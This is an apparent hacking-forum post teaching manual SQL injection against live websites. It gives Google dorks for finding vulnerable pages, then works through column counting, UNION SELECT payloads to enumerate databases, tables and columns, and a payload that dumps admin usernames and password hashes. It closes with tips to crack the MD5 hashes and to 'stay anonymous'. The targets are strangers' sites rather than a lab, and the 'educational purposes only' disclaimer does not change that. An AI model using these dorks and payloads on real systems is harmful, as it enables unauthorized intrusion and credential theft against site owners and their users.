Manual SQL Injection.

Step 1: Finding a target.
For those new to web hacking, using google dorks can really help. Here's a few:

Code:

inurl:index.php?id=
inurl:news.php?id=
inurl:gallery.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=

(Or scan for vulns on a specific site.)
Click a link, let it load. If it properly loads, put a ' at the end, you will get something similar to this:

Spoiler:

NORMAL:

TEST:

Is exploitable!

Step 2: Find Number of Columns.

Now, take away the ' and add: order by 5--
If you get an error, cool, keep reading anyways. If not, read on-you have to.
Keep adding 5 until you get a screen similar to this:

Spoiler:

Next, between the working 5 and the nonworking 5, bump the order by number up by 1 each time (order by 6--, order by 7--, etc.) until it doesn't load or gives an error. Of course, with my luck, I got the error ON error 10. Therefore, there is 9 columns!

Step 3: Find which column is vulnerable.

After id=, put a -
This is important!
Then, type in after the number, union all select 1,2,3,4,5,6,7,8,9--
Obviously, if your site only has 4 columns, it would be union all select 1,2,3,4
You'll be told which column is vulnerable directly.

Example:

Spoiler:

Step 4: Get the MySQL version

For the vulnerable column, replace the number with @@version

Example:

Spoiler:

From now on, examples will be shown as mine, just modify this to work with your site!

Step 5: Get Databases

Change your info to: union all select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--

Spoiler:

Then change group_concat(schema_name) to database(), which will give you your current database.

Step 6: Get Tables

Next:

union all select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--

Should give you the table list. Imgur stopped working, so start thinking!;D

I got a table called admin. Hell yes!

Step 7: Get Columns
union all select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()--

I got some columns, one called adminUser and another called adminPassword.

Step 8: Admin Logins!
You're almost done!

union all select 1,group_concat(adminUser,0x3a,adminPassword,0x3a),3,4,5,6,7,8 from admin--

Remember, columns in parentheses, table at end

If you get strings of what looks to be randomized letters and numbers, this is md5, so just google "decrypt md5 online" or get Cain and Abel

From there, I think you know what to do.


This is for educational purposes only. You're responsible for what you do, but remember to stay anonymous!

Zealotry

(12-04-2012, 07:45 AM)†Mescaline† Wrote: Thanks for the tutorial despite what the users above have said.